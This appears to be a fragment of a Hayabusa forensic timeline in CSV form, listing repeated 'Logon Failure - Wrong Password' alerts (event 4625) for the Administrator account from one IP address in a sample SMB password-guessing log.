+2016-09-19 16:52:00.278 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6R6ZMRoYkAPB35Bq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.349 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubqnZm0jmHNFCHrM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.419 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ORQ8vL1oo6CkJXK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rDPl1SSddrWEs979 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrK7fENAr1lxFr9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.633 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wu4djhEVSMYBOmjF | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e0NOdXhEkW6MskA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.715 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nqxLHaOtkHHNAa1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.756 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCrCf73NtEpk5DUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YVFm1epksVGO1nFY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVehuMHvh5kVqRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.875 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sERZrNUHsKVEShCb | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaSNgw2hvkxLnQF8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FSYOWptgxHYTDv1x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:00.984 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Van1qwuRoWYPWrIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.025 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyLCa9OHocazZKQ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxrR5iUsTI9LVnLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.110 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
TxMREacN0QfvL51B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fbzSHaZBDH4zFZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NgIei0bMIcslJCVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JPoKjwanczELBC5A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.290 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOYMVAnCWB2RFYAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1S45GBtQ8Uoyilw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.378 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 60oeDAnU41sz1wYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enjlrrdf6lrm7Bao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58WzO6wxh7QshZgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.505 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eZKzHgu5ADLYsWU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.548 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uOSK3xC1E5PpBVNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.598 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vFXasYWGCHbQOWWI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 4XlYJ3oHYKYhg0KC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.691 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LxOKwi8Q4y2mHBDu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwFKFySH4w2yWtPX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.794 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlwGTGadOEMfUFiM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.836 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hZ9WuMoOtxGdwOQn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cCLK0gWvRoz0Ceao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: ZDrcOxtm2fHXK5pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:01.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm2tPGetcAJkSuvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FBskiUSfF2ghuDcF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.050 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZJal2nq3JAk6I2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9ek0Sl1ikhIfIb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.141 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eHrn5Tp9JtnAgCbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.197 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7tR8gp2piqqixqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.245 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SqSBRMoiFeWe4FAt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nu4m1xKDU0OUkoR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.354 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gui98cdQHPgyNOZI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.407 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bm4U7TAfsPTEiygC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fDOoaVWVFAMLiA71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:02.497 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qiJeLgInEkHffefo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWyguWQP2iYUArhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.595 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vDa3GqsTMMXguFhi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lr0lkAcdnji1zjW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4WfNFd5MkQxaxHGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.741 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8hdPhtxP4Ds65yV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2BBoWoXWXuRysTx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6GEhZ2BduHwjJj9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.927 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GbwEHQCAUJd64LlA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:02.967 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wGfoObbN8ioefyce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.009 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iLHhCgHvmOzoLLqG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.050 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9KL69y47DMyFOWT | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.098 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ECuVYiqdMw2dMjT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.150 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YJCYumRekD7AREYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0H4OxKzoemZrsosT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.238 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSHnvxa0khWdWBVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bJkPp0bghDCPYz52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
SfHRWGXjCej9HSPb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.383 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X42H7EvrvzsRqXWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moo42NdOq30Gnz3T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.475 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4NHVYxxDkCOsQw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iPUiW0vFQB405kwS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OtcZ4ymkeLHeU7YJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: ZxZCDKWtqkGJ0dnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f4GGnhttZgmRPRJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.716 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gI0j9w45eXEFeex3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.764 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BVZ2YRDUAOsNgKxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.822 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJfIpxlcwVf7pWga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.858 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Oerixd9ODF6fslsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
